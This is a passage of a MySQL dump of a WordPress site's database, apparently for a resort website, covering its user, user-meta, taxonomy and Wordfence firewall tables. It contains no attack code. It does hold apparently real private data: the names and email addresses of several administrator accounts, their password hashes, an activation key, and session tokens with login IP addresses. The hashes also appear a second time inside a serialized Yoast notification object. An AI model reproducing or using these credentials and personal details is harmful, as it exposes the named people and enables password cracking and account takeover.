INSERT INTO `ar_term_relationships` VALUES (1,1,0),(15,2,0),(21,3,0),(26,3,0),(30,3,0),(32,2,0),(38,2,0),(41,2,0),(44,2,0),(47,2,0),(53,2,0),(62,2,0),(65,2,0),(82,2,0),(85,2,0),(89,2,0),(93,2,0),(108,2,0),(227,3,0),(353,3,0),(447,3,0),(453,3,0),(474,2,0),(639,2,0),(753,2,0),(790,2,0),(853,2,0);
/*!40000 ALTER TABLE `ar_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_term_taxonomy`
--

DROP TABLE IF EXISTS `ar_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_term_taxonomy`
--

LOCK TABLES `ar_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `ar_term_taxonomy` DISABLE KEYS */;
INSERT INTO `ar_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'nav_menu','',0,19),(3,3,'ml-slider','',0,1);
/*!40000 ALTER TABLE `ar_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_termmeta`
--

DROP TABLE IF EXISTS `ar_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_termmeta`
--

LOCK TABLES `ar_termmeta` WRITE;
/*!40000 ALTER TABLE `ar_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_terms`
--

DROP TABLE IF EXISTS `ar_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_terms`
--

LOCK TABLES `ar_terms` WRITE;
/*!40000 ALTER TABLE `ar_terms` DISABLE KEYS */;
INSERT INTO `ar_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Main','main',0),(3,'17','17',0);
/*!40000 ALTER TABLE `ar_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_usermeta`
--

DROP TABLE IF EXISTS `ar_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=214 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_usermeta`
--

LOCK TABLES `ar_usermeta` WRITE;
/*!40000 ALTER TABLE `ar_usermeta` DISABLE KEYS */;
INSERT INTO `ar_usermeta` VALUES (1,1,'nickname','ashmin'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'ar_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'ar_user_level','10'),(12,1,'dismissed_wp_pointers','tp09_edit_drag_drop_sort,wp496_privacy'),(13,1,'show_welcome_panel','0'),(14,1,'session_tokens','a:1:{s:64:\"c11def634344d0b91dc937bab398cac4b3cfd9516f22c571bc1c52dc68571a50\";a:4:{s:10:\"expiration\";i:1604254639;s:2:\"ip\";s:13:\"47.203.137.20\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\";s:5:\"login\";i:1604081839;}}'),(15,1,'ar_dashboard_quick_press_last_post_id','948'),(16,1,'wporg_favorites',''),(17,1,'ar_user-settings','libraryContent=browse&imgsize=full&editor=tinymce&hidetb=1&advImgDetails=hide&siteorigin_panels_setting_tab=general'),(18,1,'ar_user-settings-time','1520654495'),(19,1,'nav_menu_recently_edited','2'),(20,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(21,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(22,1,'last_login_time','2020-10-30 13:17:20'),(23,2,'nickname','ashbyresort@hotmail.com'),(24,2,'first_name','Dean'),(25,2,'last_name','Beneke'),(26,2,'description',''),(27,2,'rich_editing','true'),(28,2,'comment_shortcuts','false'),(29,2,'admin_color','fresh'),(30,2,'use_ssl','0'),(31,2,'show_admin_bar_front','true'),(32,2,'ar_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(33,2,'ar_user_level','10'),(34,2,'dismissed_wp_pointers','wp496_privacy,tp09_edit_drag_drop_sort'),(36,2,'last_login_time','2019-06-25 12:44:08'),(37,2,'ar_dashboard_quick_press_last_post_id','813'),(38,1,'closedpostboxes_page','a:0:{}'),(39,1,'metaboxhidden_page','a:6:{i:0;s:16:\"so-panels-panels\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:11:\"commentsdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(40,2,'default_password_nag',''),(41,2,'ar_user-settings','libraryContent=browse&editor=tinymce'),(42,2,'ar_user-settings-time','1561664383'),(44,2,'_yoast_wpseo_profile_updated','1554219201'),(45,2,'wpseo_title',''),(46,2,'wpseo_metadesc',''),(47,2,'wpseo_metakey',''),(48,2,'wpseo_noindex_author',''),(49,2,'wpseo_content_analysis_disable',''),(50,2,'wpseo_keyword_analysis_disable',''),(51,2,'locale',''),(52,2,'googleplus',''),(53,2,'twitter',''),(54,2,'facebook',''),(56,2,'nav_menu_recently_edited','2'),(57,2,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(58,2,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(59,2,'closedpostboxes_page','a:0:{}'),(60,2,'metaboxhidden_page','a:7:{i:0;s:16:\"so-panels-panels\";i:1;s:12:\"revisionsdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:11:\"commentsdiv\";i:5;s:7:\"slugdiv\";i:6;s:9:\"authordiv\";}'),(62,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"47.203.137.0\";}'),(63,1,'_yoast_wpseo_profile_updated','1522527626'),(68,2,'syntax_highlighting','true'),(69,1,'wpseo_title',''),(70,1,'wpseo_metadesc',''),(71,1,'wpseo_noindex_author',''),(72,1,'wpseo_content_analysis_disable',''),(73,1,'wpseo_keyword_analysis_disable',''),(74,1,'syntax_highlighting','true'),(75,1,'locale',''),(76,1,'googleplus',''),(77,1,'twitter',''),(78,1,'facebook',''),(83,1,'ar_tablepress_user_options','{\"user_options_db_version\":41,\"admin_menu_parent_page\":\"middle\",\"message_first_visit\":true}'),(85,1,'managetablepress_listcolumnshidden','a:1:{i:0;s:22:\"table_last_modified_by\";}'),(89,2,'community-events-location','a:1:{s:2:\"ip\";s:11:\"69.165.25.0\";}'),(92,2,'instagram',''),(93,2,'linkedin',''),(94,2,'pinterest',''),(96,1,'elementor_introduction','a:2:{s:7:\"flexbox\";b:1;s:10:\"rightClick\";b:1;}'),(97,2,'elementor_introduction','a:2:{s:7:\"flexbox\";b:1;s:10:\"rightClick\";b:1;}'),(100,1,'ar_metaslider_user_saw_callout_unsplash','1'),(101,1,'elementor_admin_notices','a:1:{s:16:\"rate_us_feedback\";s:4:\"true\";}'),(106,2,'wfls-last-captcha-score',''),(108,2,'wfls-last-login','1561484648'),(114,2,'session_tokens','a:2:{s:64:\"4d4c898a534b7f8bab8c4c724df98dbe9d184719f299897c66a63a540853a980\";a:4:{s:10:\"expiration\";i:1561656880;s:2:\"ip\";s:13:\"97.96.138.155\";s:2:\"ua\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:67.0) Gecko/20100101 Firefox/67.0\";s:5:\"login\";i:1561484080;}s:64:\"763963ce2937939da39c5869a9e2749e1c03fb328b23fb9a6b176481aa12c18a\";a:4:{s:10:\"expiration\";i:1562694247;s:2:\"ip\";s:13:\"69.165.25.149\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:5:\"login\";i:1561484647;}}'),(116,1,'wfls-last-captcha-score',''),(117,1,'wfls-last-login','1604081840'),(118,3,'nickname','Dean'),(119,3,'first_name','Dean'),(120,3,'last_name','Beneke'),(121,3,'description',''),(122,3,'rich_editing','true'),(123,3,'syntax_highlighting','true'),(124,3,'comment_shortcuts','false'),(125,3,'admin_color','fresh'),(126,3,'use_ssl','0'),(127,3,'show_admin_bar_front','true'),(128,3,'locale',''),(129,3,'ar_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(130,3,'ar_user_level','10'),(131,3,'_yoast_wpseo_profile_updated','1560542645'),(132,3,'dismissed_wp_pointers','tp09_edit_drag_drop_sort'),(133,2,'managetablepress_listcolumnshidden','a:1:{i:0;s:22:\"table_last_modified_by\";}'),(136,3,'default_password_nag',''),(138,3,'wfls-last-captcha-score',''),(139,3,'session_tokens','a:2:{s:64:\"82240c22a10c44c432174e9cc603df60e04e3721e49dbc78d59905bea1050377\";a:4:{s:10:\"expiration\";i:1598530663;s:2:\"ip\";s:13:\"69.165.31.165\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\";s:5:\"login\";i:1598357863;}s:64:\"8ae33a5677da061302c788faafae1fb49f8b2d1378aa00f12820d98ec9ec9f02\";a:4:{s:10:\"expiration\";i:1598532441;s:2:\"ip\";s:13:\"69.165.31.165\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36\";s:5:\"login\";i:1598359641;}}'),(140,3,'last_login_time','2020-08-25 07:47:21'),(141,3,'wfls-last-login','1598359641'),(142,3,'ar_dashboard_quick_press_last_post_id','949'),(143,3,'community-events-location','a:1:{s:2:\"ip\";s:11:\"69.165.31.0\";}'),(144,3,'ar_user-settings','editor=tinymce&libraryContent=browse'),(145,3,'ar_user-settings-time','1588625169'),(146,3,'closedpostboxes_tablepress_edit','a:0:{}'),(147,3,'metaboxhidden_tablepress_edit','a:0:{}'),(149,1,'ar_metaslider_user_saw_callout_toolbar','1'),(156,3,'elementor_introduction','a:1:{s:10:\"rightClick\";b:1;}'),(157,1,'closedpostboxes_dashboard','a:4:{i:0;s:17:\"so-dashboard-news\";i:1;s:27:\"wpforms_reports_widget_lite\";i:2;s:20:\"e-dashboard-overview\";i:3;s:17:\"dashboard_primary\";}'),(158,1,'metaboxhidden_dashboard','a:0:{}'),(159,1,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:188:\"booking_dashboard_widget,so-dashboard-news,wpforms_reports_widget_lite,e-dashboard-overview,dashboard_right_now,dashboard_activity,wordfence_activity_report_widget,wpseo-dashboard-overview\";s:4:\"side\";s:39:\"dashboard_quick_press,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(162,4,'nickname','dconway'),(163,4,'first_name','David'),(164,4,'last_name','Conway'),(165,4,'description',''),(166,4,'rich_editing','true'),(167,4,'syntax_highlighting','true'),(168,4,'comment_shortcuts','false'),(169,4,'admin_color','fresh'),(170,4,'use_ssl','0'),(171,4,'show_admin_bar_front','true'),(172,4,'locale',''),(173,4,'ar_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(174,4,'ar_user_level','10'),(175,4,'_yoast_wpseo_profile_updated','1571530638'),(176,4,'dismissed_wp_pointers',''),(211,1,'ar_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:367:\"<strong>New in Yoast SEO 15.2: </strong>You’re now able to optimize URLs for more visibility when shared on Slack! <a href=\"https://yoa.st/yoast15-2?php_version=7.2&#038;platform=wordpress&#038;platform_version=5.5.1&#038;software=free&#038;software_version=15.2&#038;days_active=30plus&#038;user_language=en_US\" target=\"_blank\">Read all about version 15.2 here</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"updated\";s:2:\"id\";s:20:\"wpseo-plugin-updated\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:6:\"ashmin\";s:9:\"user_pass\";s:34:\"$P$Bv7FQodmihsxJM1fGFH.q4Vb4fr772/\";s:13:\"user_nicename\";s:6:\"ashmin\";s:10:\"user_email\";s:21:\"admin@ashbyresort.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-03-12 21:09:04\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:6:\"ashmin\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"ar_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:78:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:20:\"wpseo_manage_options\";b:1;s:22:\"tablepress_edit_tables\";b:1;s:24:\"tablepress_delete_tables\";b:1;s:22:\"tablepress_list_tables\";b:1;s:21:\"tablepress_add_tables\";b:1;s:22:\"tablepress_copy_tables\";b:1;s:24:\"tablepress_import_tables\";b:1;s:24:\"tablepress_export_tables\";b:1;s:32:\"tablepress_access_options_screen\";b:1;s:30:\"tablepress_access_about_screen\";b:1;s:29:\"tablepress_import_tables_wptr\";b:1;s:23:\"tablepress_edit_options\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:1:{s:13:\"dismiss_value\";s:4:\"15.2\";}s:13:\"dismissal_key\";s:20:\"wpseo-plugin-updated\";s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}');
/*!40000 ALTER TABLE `ar_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_users`
--

DROP TABLE IF EXISTS `ar_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_users`
--

LOCK TABLES `ar_users` WRITE;
/*!40000 ALTER TABLE `ar_users` DISABLE KEYS */;
INSERT INTO `ar_users` VALUES (1,'ashmin','$P$Bv7FQodmihsxJM1fGFH.q4Vb4fr772/','ashmin','admin@ashbyresort.com','','2016-03-12 21:09:04','',0,'ashmin'),(2,'ashbyresort@hotmail.com','$P$BL68hauguzSgvaDjukq7ZF6/MYa30e0','ashbyresorthotmail-com','ashbyresort@hotmail.com','http://ashbyresort.com','2016-03-27 23:41:16','',0,'Dean Beneke'),(3,'Dean','$P$BvBcL6AToFvDCHIzeCkL6df7wEQLwi1','dean','theashbyresort@gmail.com','http://ashbyresort.com','2019-06-14 20:04:05','',0,'Dean Beneke'),(4,'dconway','$P$B9IlwPtv.bwyU.UAGh2MYn7yU4xymo.','dconway','dbc@expcom.com','http://ashbyresort.com','2019-10-20 00:17:18','1571530638:$P$BeTulSp2JvyPTXn3nmAGMWOO0.V8/d/',0,'David Conway');
/*!40000 ALTER TABLE `ar_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfBlockedIPLog`
--

DROP TABLE IF EXISTS `ar_wfBlockedIPLog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfBlockedIPLog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfBlockedIPLog`
--

LOCK TABLES `ar_wfBlockedIPLog` WRITE;
/*!40000 ALTER TABLE `ar_wfBlockedIPLog` DISABLE KEYS */;
INSERT INTO `ar_wfBlockedIPLog` VALUES ('\0\0\0\0\0\0\0\0\0\0\r','DE',3,18582,'waf'),('\0\0\0\0\0\0\0\0\0\0b','FR',3,18582,'waf'),('\0\0\0\0\0\0\0\0\0\04y','US',1,18577,'waf'),('\0\0\0\0\0\0\0\0\0\0\rD','US',1,18576,'waf'),('\0\0\0\0\0\0\0\0\0\0RfL','IT',6,18575,'waf'),('\0\0\0\0\0\0\0\0\0\04y','US',1,18574,'waf'),('\0\0\0\0\0\0\0\0\0\04y','US',1,18569,'waf'),('\0\0\0\0\0\0\0\0\0\03[E','FR',11,18569,'waf'),('\0\0\0\0\0\0\0\0\0\0hO.','US',1,18568,'waf'),('\0\0\0\0\0\0\0\0\0\0#Z','DE',1,18566,'waf'),('\0\0\0\0\0\0\0\0\0\06\'','CA',1,18566,'waf'),('\0\0\0\0\0\0\0\0\0\03S','FR',3,18560,'waf'),('\0\0\0\0\0\0\0\0\0\0	G','DE',1,18559,'waf'),('\0\0\0\0\0\0\0\0\0\0','TN',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0q3','VN',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0n#','ID',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0Ih','CO',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0BL','BR',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0el`\"','TH',1,18555,'waf'),('\0\0\0\0\0\0\0\0\0\0 P','US',1,18554,'waf'),('\0\0\0\0\0\0\0\0\0\0R','US',9,18547,'waf'),('\0\0\0\0\0\0\0\0\0\0z','BR',1,18540,'waf'),('\0\0\0\0\0\0\0\0\0\0r','ID',1,18540,'waf'),('\0\0\0\0\0\0\0\0\0\0gi@','IN',1,18540,'waf'),('\0\0\0\0\0\0\0\0\0\0','IN',1,18540,'waf'),('\0\0\0\0\0\0\0\0\0\0Ԡ','PR',1,18540,'waf'),('\0\0\0\0\0\0\0\0\0\0\r}','AR',1,18533,'waf'),('\0\0\0\0\0\0\0\0\0\0ʍf','PK',1,18533,'waf'),('\0\0\0\0\0\0\0\0\0\0%;#','FR',1,18522,'waf'),('\0\0\0\0\0\0\0\0\0\0','VN',1,18520,'waf'),('\0\0\0\0\0\0\0\0\0\0\"','RU',1,18520,'waf'),('\0\0\0\0\0\0\0\0\0\0Noe','RU',1,18520,'waf'),('\0\0\0\0\0\0\0\0\0\0;.','RU',1,18520,'waf'),('\0\0\0\0\0\0\0\0\0\0+{','IN',1,18520,'waf'),('\0\0\0\0\0\0\0\0\0\0%','BY',1,18515,'waf'),('\0\0\0\0\0\0\0\0\0\04','US',18,18514,'waf'),('\0\0\0\0\0\0\0\0\0\04','US',18,18513,'waf'),('\0\0\0\0\0\0\0\0\0\0q6^','VN',1,18508,'waf'),('\0\0\0\0\0\0\0\0\0\0Ä','RU',1,18508,'waf'),('\0\0\0\0\0\0\0\0\0\03Sȭ','FR',1,18423,'waf'),('\0\0\0\0\0\0\0\0\0\0\rR','US',9,18420,'waf'),('\0\0\0\0\0\0\0\0\0\0UΣ','LT',2,18419,'waf'),('\0\0\0\0\0\0\0\0\0\0D[','IN',6,18418,'waf'),('\0\0\0\0\0\0\0\0\0\0c','SG',6,18417,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',1,18414,'waf'),('\0\0\0\0\0\0\0\0\0\0L~2B','US',1,18414,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',1,18411,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',1,18410,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',1,18409,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',1,18448,'waf'),('\0\0\0\0\0\0\0\0\0\0K','SG',1,18444,'waf'),('\0\0\0\0\0\0\0\0\0\0ԫ','NL',1,18441,'waf'),('\0\0\0\0\0\0\0\0\0\0_ع','DE',2,18505,'waf'),('\0\0\0\0\0\0\0\0\0\0Ԕp','RU',1,18494,'waf'),('\0\0\0\0\0\0\0\0\0\0,x','US',9,18486,'waf'),('\0\0\0\0\0\0\0\0\0\0[','US',1,18482,'waf'),('\0\0\0\0\0\0\0\0\0\0f!','US',6,18479,'waf'),('\0\0\0\0\0\0\0\0\0\0_','FR',2,18479,'waf'),('\0\0\0\0\0\0\0\0\0\0f!','US',1,18479,'waf'),('\0\0\0\0\0\0\0\0\0\0X','DE',9,18475,'waf'),('\0\0\0\0\0\0\0\0\0\0(Yj','FR',9,18472,'waf'),('\0\0\0\0\0\0\0\0\0\0)m','DZ',9,18469,'waf'),('\0\0\0\0\0\0\0\0\0\0','RU',1,18465,'waf'),('\0\0\0\0\0\0\0\0\0\04','SG',13,18458,'waf'),('\0\0\0\0\0\0\0\0\0\0r&','CN',1,18456,'waf'),('\0\0\0\0\0\0\0\0\0\0޼\Z7','CN',1,18436,'waf'),('\0\0\0\0\0\0\0\0\0\0h;','US',9,18436,'waf'),('\0\0\0\0\0\0\0\0\0\04+','US',8,18433,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',2,18433,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',2,18431,'waf'),('\0\0\0\0\0\0\0\0\0\0u<V','CN',4,18431,'waf'),('\0\0\0\0\0\0\0\0\0\0XcO','DE',1,18431,'waf'),('\0\0\0\0\0\0\0\0\0\0gR','US',2,18430,'waf'),('\0\0\0\0\0\0\0\0\0\0','BR',1,18429,'waf'),('\0\0\0\0\0\0\0\0\0\0~>','CN',4,18429,'waf'),('\0\0\0\0\0\0\0\0\0\0[f','RO',4,18429,'waf');
/*!40000 ALTER TABLE `ar_wfBlockedIPLog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfBlocks7`
--

DROP TABLE IF EXISTS `ar_wfBlocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfBlocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfBlocks7`
--

LOCK TABLES `ar_wfBlocks7` WRITE;
/*!40000 ALTER TABLE `ar_wfBlocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfBlocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfConfig`
--

DROP TABLE IF EXISTS `ar_wfConfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfConfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfConfig`
--

LOCK TABLES `ar_wfConfig` WRITE;
/*!40000 ALTER TABLE `ar_wfConfig` DISABLE KEYS */;
